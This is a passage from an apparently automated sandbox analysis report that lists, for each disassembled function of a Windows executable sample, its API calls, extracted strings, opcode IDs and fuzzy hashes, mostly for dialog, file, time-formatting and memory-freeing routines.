                                                            • Opcode Fuzzy Hash: 6d6f84fce9d6fd765e275c061240c6bd85759acdda8ed0383bf22aafc33e4384
                                                            • Instruction Fuzzy Hash: 51A011C22A8882BCB00822022CA2C3B028CC8C2F20B308AAEF822800C0BA808C080830
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE51F
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE51F
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE51F
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            APIs
                                                            • SetEndOfFile.KERNELBASE(?,00BD903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00BD9F0C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            Similarity
                                                            • API ID: File
                                                            • String ID:
                                                            • API String ID: 749574446-0
                                                            APIs
                                                            • SetCurrentDirectoryW.KERNELBASE(?,00BEAE72,C:\Users\user\Desktop,00000000,00C1946A,00000006), ref: 00BEAC08
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            Similarity
                                                            • API ID: CurrentDirectory
                                                            • String ID:
                                                            • API String ID: 1611563598-0
                                                            APIs
                                                            • CloseHandle.KERNELBASE(000000FF,?,?,00BD95D6,?,?,?,?,?,00C02641,000000FF), ref: 00BD963B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            Similarity
                                                            • API ID: CloseHandle
                                                            • String ID:
                                                            • API String ID: 2962429428-0
                                                            APIs
                                                              • Part of subcall function 00BD1316: GetDlgItem.USER32(00000000,00003021), ref: 00BD135A
                                                              • Part of subcall function 00BD1316: SetWindowTextW.USER32(00000000,00C035F4), ref: 00BD1370
                                                            • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00BEC2B1
                                                            • EndDialog.USER32(?,00000006), ref: 00BEC2C4
                                                            • GetDlgItem.USER32(?,0000006C), ref: 00BEC2E0
                                                            • SetFocus.USER32(00000000), ref: 00BEC2E7
                                                            • SetDlgItemTextW.USER32(?,00000065,?), ref: 00BEC321
                                                            • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00BEC358
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00BEC36E
                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00BEC38C
                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 00BEC39C
                                                            • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00BEC3B8
                                                            • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00BEC3D4
                                                            • _swprintf.LIBCMT ref: 00BEC404
                                                              • Part of subcall function 00BD4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BD40A5
                                                            • SetDlgItemTextW.USER32(?,0000006A,?), ref: 00BEC417
                                                            • FindClose.KERNEL32(00000000), ref: 00BEC41E
                                                            • _swprintf.LIBCMT ref: 00BEC477
                                                            • SetDlgItemTextW.USER32(?,00000068,?), ref: 00BEC48A
                                                            • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00BEC4A7
                                                            • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00BEC4C7
                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 00BEC4D7
                                                            • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00BEC4F1
                                                            • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00BEC509
                                                            • _swprintf.LIBCMT ref: 00BEC535
                                                            • SetDlgItemTextW.USER32(?,0000006B,?), ref: 00BEC548
                                                            • _swprintf.LIBCMT ref: 00BEC59C
                                                            • SetDlgItemTextW.USER32(?,00000069,?), ref: 00BEC5AF
                                                              • Part of subcall function 00BEAF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00BEAF35
                                                              • Part of subcall function 00BEAF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,00C0E72C,?,?), ref: 00BEAF84
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            Similarity
                                                            • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                            • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                            • API String ID: 797121971-1840816070
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 00BD6FAA
                                                            • _wcslen.LIBCMT ref: 00BD7013
                                                            • _wcslen.LIBCMT ref: 00BD7084
                                                              • Part of subcall function 00BD7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00BD7AAB
                                                              • Part of subcall function 00BD7A9C: GetLastError.KERNEL32 ref: 00BD7AF1
                                                              • Part of subcall function 00BD7A9C: CloseHandle.KERNEL32(?), ref: 00BD7B00
                                                              • Part of subcall function 00BDA1E0: DeleteFileW.KERNELBASE(000000FF,?,?,00BD977F,?,?,00BD95CF,?,?,?,?,?,00C02641,000000FF), ref: 00BDA1F1
                                                              • Part of subcall function 00BDA1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00BD977F,?,?,00BD95CF,?,?,?,?,?,00C02641), ref: 00BDA21F
                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00BD7139
                                                            • CloseHandle.KERNEL32(00000000), ref: 00BD7155
                                                            • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00BD7298
                                                              • Part of subcall function 00BD9DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00BD73BC,?,?,?,00000000), ref: 00BD9DBC
                                                              • Part of subcall function 00BD9DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00BD9E70
                                                              • Part of subcall function 00BD9620: CloseHandle.KERNELBASE(000000FF,?,?,00BD95D6,?,?,?,?,?,00C02641,000000FF), ref: 00BD963B
                                                              • Part of subcall function 00BDA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00BDA325,?,?,?,00BDA175,?,00000001,00000000,?,?), ref: 00BDA501
                                                              • Part of subcall function 00BDA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00BDA325,?,?,?,00BDA175,?,00000001,00000000,?,?), ref: 00BDA532
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            Similarity
                                                            • API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
                                                            • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                            • API String ID: 3983180755-3508440684
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            Similarity
                                                            • API ID: __floor_pentium4
                                                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                            • API String ID: 4168288129-2761157908
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            Similarity
                                                            • API ID: H_prolog_swprintf
                                                            • String ID: CMT$h%u$hc%u
                                                            • API String ID: 146138363-3282847064
                                                            • Opcode ID: a2e70b326db007a1ca2b8ef3eb2f5cfdaa092064a5ae87c989d716617ae5c6dc
                                                            • Instruction ID: dc7698fc4bd9c75552bdf10154d5ceb4aeef021e258b47f14807e0bd54570c2d
                                                            • Opcode Fuzzy Hash: a2e70b326db007a1ca2b8ef3eb2f5cfdaa092064a5ae87c989d716617ae5c6dc
                                                            • Instruction Fuzzy Hash: 8832F4715102859BDB14DF74C895AE97BE5EF15700F0804BBFD8A8B383EB749A48CB61
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 00BD2874
                                                            • _strlen.LIBCMT ref: 00BD2E3F
                                                              • Part of subcall function 00BE02BA: __EH_prolog.LIBCMT ref: 00BE02BF
                                                              • Part of subcall function 00BE1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00BDBAE9,00000000,?,?,?,0001043E), ref: 00BE1BA0
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BD2F91
                                                            Strings
                                                            Similarity
                                                            • API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                                            • String ID: CMT
                                                            • API String ID: 1206968400-2756464174
                                                            • Opcode ID: fd9b7f9923502e6bd0737caba02fd2abb06ea58242778dbcc5e40ff1194b5dbd
                                                            • Instruction ID: a228b58b1c35690b4c85eeb5ce16bcae981b69906660420840be663d9ba0c70c
                                                            • Opcode Fuzzy Hash: fd9b7f9923502e6bd0737caba02fd2abb06ea58242778dbcc5e40ff1194b5dbd
                                                            • Instruction Fuzzy Hash: 2062D5715002858FDB19DF38C8956EABBE1EF64300F0845BFED9A8B382E7759945CB60
                                                            APIs
                                                            • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00BEF844
                                                            • IsDebuggerPresent.KERNEL32 ref: 00BEF910
                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00BEF930
                                                            • UnhandledExceptionFilter.KERNEL32(?), ref: 00BEF93A
                                                            Similarity
                                                            • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                            • String ID:
                                                            • API String ID: 254469556-0
                                                            • Opcode ID: 3edb9019c029b35ece3265901d8fc77fa2ca635bde9a7984e09e578a355d2846
                                                            • Instruction ID: 0fd50c22a908f57abbffbc5f64f116dd7826364a8b01eb7b851bc1d62e922df1
                                                            • Opcode Fuzzy Hash: 3edb9019c029b35ece3265901d8fc77fa2ca635bde9a7984e09e578a355d2846
                                                            • Instruction Fuzzy Hash: 0A311475D052599BDB20DFA5D989BCCBBF8AF08304F1040EAE40CAB250EB719B84CF44
                                                            APIs
                                                            • VirtualQuery.KERNEL32(80000000,00BEE5E8,0000001C,00BEE7DD,00000000,?,?,?,?,?,?,?,00BEE5E8,00000004,00C31CEC,00BEE86D), ref: 00BEE6B4
                                                            • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00BEE5E8,00000004,00C31CEC,00BEE86D), ref: 00BEE6CF
                                                            Strings
                                                            Similarity
                                                            • API ID: InfoQuerySystemVirtual
                                                            • String ID: D
                                                            • API String ID: 401686933-2746444292
                                                            • Opcode ID: 3f71cc7cca01fa3b938047b4123d181e23987e61557db1ef82a312c03c54cb1a
                                                            • Instruction ID: 1e30af5c95656ef0d20064a64f30628a9c87648b1ca84d37b1d95d26638cee9b
                                                            • Opcode Fuzzy Hash: 3f71cc7cca01fa3b938047b4123d181e23987e61557db1ef82a312c03c54cb1a
                                                            • Instruction Fuzzy Hash: 0801D4326001496BDB14DE29DC09BDE7BEAEFC4324F0CC160ED29D6154D738ED058680
                                                            APIs
                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00BF8FB5
                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00BF8FBF
                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00BF8FCC
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                            • String ID:
                                                            • API String ID: 3906539128-0
                                                            • Opcode ID: a63be46202414e67bc7353150f1972b9633586aca522b8859157c3cfec2e649b
                                                            • Instruction ID: 77119dc243f90aa117cb5002f2d0e96ca3f6198ed89a1d353eea15ef1f555a8e
                                                            • Opcode Fuzzy Hash: a63be46202414e67bc7353150f1972b9633586aca522b8859157c3cfec2e649b
                                                            • Instruction Fuzzy Hash: AE31B27590122DABCB21DF69D889B9DBBF8EF48310F5045EAE41CA7250EB709F858F44
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                            • Instruction ID: 09399a3e2ae3aed1b9f0ee280d7840c7ee8ff495b7cf931a68e044632cb86169
                                                            • Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                            • Instruction Fuzzy Hash: 33020D71E002199BDF14DFA9C9806ADF7F2EF48314F2582A9D919EB384D731AD45CB90
                                                            APIs
                                                            • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00BEAF35
                                                            • GetNumberFormatW.KERNEL32(00000400,00000000,?,00C0E72C,?,?), ref: 00BEAF84
                                                            Similarity
                                                            • API ID: FormatInfoLocaleNumber
                                                            • String ID:
                                                            • API String ID: 2169056816-0
                                                            • Opcode ID: e47d13541fea4c3575dbe6a632de963f0e98ffea9b7dcf06a4a4d867bc6a4f28
                                                            • Instruction ID: c3e964849617d2881dfdaeec15bc81e41cacd90fd32b619bca9c809d3baceb9c
                                                            • Opcode Fuzzy Hash: e47d13541fea4c3575dbe6a632de963f0e98ffea9b7dcf06a4a4d867bc6a4f28
                                                            • Instruction Fuzzy Hash: 0A017C7A250348AAD7219F75EC45F9EB7BCEF08710F004426FA05E7190E370AA55CBA5
                                                            APIs
                                                            • GetLastError.KERNEL32(00BD6DDF,00000000,00000400), ref: 00BD6C74
                                                            • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00BD6C95
                                                            Similarity
                                                            • API ID: ErrorFormatLastMessage
                                                            • String ID:
                                                            • API String ID: 3479602957-0
                                                            • Opcode ID: 559ffb0775ce4ff25f5d8898716509be40b9b54a7f13f666c251a899f9e9dad3
                                                            • Instruction ID: 53549e14a34b1672279672e63d7fc57a0e1b9bab8c23645a28b0901665de8913
                                                            • Opcode Fuzzy Hash: 559ffb0775ce4ff25f5d8898716509be40b9b54a7f13f666c251a899f9e9dad3
                                                            • Instruction Fuzzy Hash: A8D0C931385300BFFA110B618D46F2EBB9DFF45B55F19C445B795E80E0DA789424E629
                                                            APIs
                                                            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00C019EF,?,?,00000008,?,?,00C0168F,00000000), ref: 00C01C21
                                                            Similarity
                                                            • API ID: ExceptionRaise
                                                            • String ID:
                                                            • API String ID: 3997070919-0
                                                            • Opcode ID: cff255d3c208b05844df053e4e3f8bff879aeb468e42bee7619ac5d9dc8394e4
                                                            • Instruction ID: 755208492d5ce68a01e51026853205b5e594df6246979a23d32538ad174046ea
                                                            • Opcode Fuzzy Hash: cff255d3c208b05844df053e4e3f8bff879aeb468e42bee7619ac5d9dc8394e4
                                                            • Instruction Fuzzy Hash: 6BB12C756106099FE715CF28C48AB65BBE0FF45364F298658E8AACF2E1C335DA91CB40
                                                            APIs
                                                            • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00BEF66A
                                                            Similarity
                                                            • API ID: FeaturePresentProcessor
                                                            • String ID:
                                                            • API String ID: 2325560087-0
                                                            • Opcode ID: 7199902f159a2cc94d0a9f916b09383cb7621aa554b15ecee15e178d4bc44901
                                                            • Instruction ID: 8c073703e88777c72e2f7fe19ac61a8969f546eb6b3577e79bf68aa3c99b1e0e
                                                            • Opcode Fuzzy Hash: 7199902f159a2cc94d0a9f916b09383cb7621aa554b15ecee15e178d4bc44901
                                                            • Instruction Fuzzy Hash: B65181B1A10656CFEB15CF59E8817AEBBF4FB88314F298979D801EB250D3749D01CB50
                                                            APIs
                                                            • GetVersionExW.KERNEL32(?), ref: 00BDB16B
                                                            Similarity
                                                            • API ID: Version
                                                            • String ID:
                                                            • API String ID: 1889659487-0
                                                            • Opcode ID: 1b6f291a5ba9d612a7a3582495dcf8b0e9e04f65948e28f1511070395c258878
                                                            • Instruction ID: 011d02e0bb6cf1d795f1977fb93dc5b1d9ee8039966d3799f9fed2f0d3b71414
                                                            • Opcode Fuzzy Hash: 1b6f291a5ba9d612a7a3582495dcf8b0e9e04f65948e28f1511070395c258878
                                                            • Instruction Fuzzy Hash: 8CF030B4D00208CFDB18CB18EC91BDD77F5FB49319F15469ADA1593390D374AA81CE60
                                                            Strings
                                                            Similarity
                                                            • API ID:
                                                            • String ID: gj
                                                            • API String ID: 0-4203073231
                                                            • Opcode ID: 1391e18ffd7bd9e876231ffcb72c43c8696275935ffdbfd6ae1ebd7970ada0cd
                                                            • Instruction ID: cd2adecd045b06b550ba61e97100126b752bb41e2aa8d0f5e19312d8df407015
                                                            • Opcode Fuzzy Hash: 1391e18ffd7bd9e876231ffcb72c43c8696275935ffdbfd6ae1ebd7970ada0cd
                                                            • Instruction Fuzzy Hash: BBC12776A183818FC354CF29D88065AFBE1BFC8308F19892EE998D7311D734E955CB96
                                                            APIs
                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,00BEF3A5), ref: 00BEF9DA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled
                                                            • String ID:
                                                            • API String ID: 3192549508-0
                                                            • Opcode ID: 4b30360f282df40fb2e75f4c3a732f226f6771709796b2c668f1ee446ddf6e10
                                                            • Instruction ID: 8a9a3cce2907325ad2308ec950e695bd245de7d1594f173ccf9354078b439072
                                                            • Opcode Fuzzy Hash: 4b30360f282df40fb2e75f4c3a732f226f6771709796b2c668f1ee446ddf6e10
                                                            • Instruction Fuzzy Hash:
                                                            Similarity
                                                            • API ID: HeapProcess
                                                            • String ID:
                                                            • API String ID: 54951025-0
                                                            • Opcode ID: cacd782e735f307ca7e881de80563c451c85cd418a29fe2699451e17004be8ab
                                                            • Instruction ID: dd98067d03e81c6fb8b5bb7717cabd24b3f4fb53ab24bfbc4fb6437bbf766b93
                                                            • Opcode Fuzzy Hash: cacd782e735f307ca7e881de80563c451c85cd418a29fe2699451e17004be8ab
                                                            • Instruction Fuzzy Hash: C3A001706122419BDB448F35AF4A74D3AA9AA5A69170A406AA509C5160EA2485A0AA01
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            • Opcode ID: 47fa51547ed9c9339d22707bff8516c8f77da2bcdbab773e81c6d4d81e3c6e97
                                                            • Instruction ID: 5882779cee5e6908a13888e5fce7a4194433dccdd54abafb587fea8a2e58332a
                                                            • Opcode Fuzzy Hash: 47fa51547ed9c9339d22707bff8516c8f77da2bcdbab773e81c6d4d81e3c6e97
                                                            • Instruction Fuzzy Hash: 07D1E6716483858FCB14CF29C88475BBBE1FF99308F0445ADE8899B342D774E905CB96
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 85088c9e326902f4f74716c7875f9545bbef1bbb9a5326de234af0627b33f714
                                                            • Instruction ID: 6b708523f15f2f09c29b101d337d1aa885ab35476645ec1f01c6085b2a934247
                                                            • Opcode Fuzzy Hash: 85088c9e326902f4f74716c7875f9545bbef1bbb9a5326de234af0627b33f714
                                                            • Instruction Fuzzy Hash: 5C51DFB1A087159FC748CF19D48055AF7E1FF88314F058A2EE899E3341D734EA99CB9A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                            • Instruction ID: 774bec96438991e4cdf8983b7262865bf04784657ef0d097b5b471b8d01c6ba5
                                                            • Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                            • Instruction Fuzzy Hash: 6C3118B1A147468FCB18DF29C89116EFBE0FB95704F10456DE885C7341D735EA0ACB91
                                                            APIs
                                                            • _swprintf.LIBCMT ref: 00BDE30E
                                                              • Part of subcall function 00BD4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BD40A5
                                                              • Part of subcall function 00BE1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00C11030,00000200,00BDD928,00000000,?,00000050,00C11030), ref: 00BE1DC4
                                                            • _strlen.LIBCMT ref: 00BDE32F
                                                            • SetDlgItemTextW.USER32(?,00C0E274,?), ref: 00BDE38F
                                                            • GetWindowRect.USER32(?,?), ref: 00BDE3C9
                                                            • GetClientRect.USER32(?,?), ref: 00BDE3D5
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00BDE475
                                                            • GetWindowRect.USER32(?,?), ref: 00BDE4A2
                                                            • SetWindowTextW.USER32(?,?), ref: 00BDE4DB
                                                            • GetSystemMetrics.USER32(00000008), ref: 00BDE4E3
                                                            • GetWindow.USER32(?,00000005), ref: 00BDE4EE
                                                            • GetWindowRect.USER32(00000000,?), ref: 00BDE51B
                                                            • GetWindow.USER32(00000000,00000002), ref: 00BDE58D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                            • String ID: $%s:$CAPTION$d
                                                            • API String ID: 2407758923-2512411981
                                                            • Opcode ID: dabb7cadd0b0f7b5889052a80e6d2b7768f378b8647341e31e624562007e2c9e
                                                            • Instruction ID: 5beea1ae317a3e42e709774fd6c305f8ca821c00b1afa8d80d48408ebdb530ff
                                                            • Opcode Fuzzy Hash: dabb7cadd0b0f7b5889052a80e6d2b7768f378b8647341e31e624562007e2c9e
                                                            • Instruction Fuzzy Hash: AA81B071208341AFD710DFA8CD89B6FFBE9EB88714F04092EFA9597250E735E9058B52
                                                            APIs
                                                            • ___free_lconv_mon.LIBCMT ref: 00BFCB66
                                                              • Part of subcall function 00BFC701: _free.LIBCMT ref: 00BFC71E
                                                              • Part of subcall function 00BFC701: _free.LIBCMT ref: 00BFC730
                                                              • Part of subcall function 00BFC701: _free.LIBCMT ref: 00BFC742
                                                              • Part of subcall function 00BFC701: _free.LIBCMT ref: 00BFC754
                                                              • Part of subcall function 00BFC701: _free.LIBCMT ref: 00BFC766
                                                              • Part of subcall function 00BFC701: _free.LIBCMT ref: 00BFC778
                                                              • Part of subcall function 00BFC701: _free.LIBCMT ref: 00BFC78A
                                                              • Part of subcall function 00BFC701: _free.LIBCMT ref: 00BFC79C
                                                              • Part of subcall function 00BFC701: _free.LIBCMT ref: 00BFC7AE
                                                              • Part of subcall function 00BFC701: _free.LIBCMT ref: 00BFC7C0
                                                              • Part of subcall function 00BFC701: _free.LIBCMT ref: 00BFC7D2
                                                              • Part of subcall function 00BFC701: _free.LIBCMT ref: 00BFC7E4
                                                              • Part of subcall function 00BFC701: _free.LIBCMT ref: 00BFC7F6
                                                            • _free.LIBCMT ref: 00BFCB5B
                                                              • Part of subcall function 00BF8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00BFC896,?,00000000,?,00000000,?,00BFC8BD,?,00000007,?,?,00BFCCBA,?), ref: 00BF8DE2
                                                              • Part of subcall function 00BF8DCC: GetLastError.KERNEL32(?,?,00BFC896,?,00000000,?,00000000,?,00BFC8BD,?,00000007,?,?,00BFCCBA,?,?), ref: 00BF8DF4
                                                            • _free.LIBCMT ref: 00BFCB7D
                                                            • _free.LIBCMT ref: 00BFCB92
                                                            • _free.LIBCMT ref: 00BFCB9D
                                                            • _free.LIBCMT ref: 00BFCBBF
                                                            • _free.LIBCMT ref: 00BFCBD2
                                                            • _free.LIBCMT ref: 00BFCBE0
                                                            • _free.LIBCMT ref: 00BFCBEB
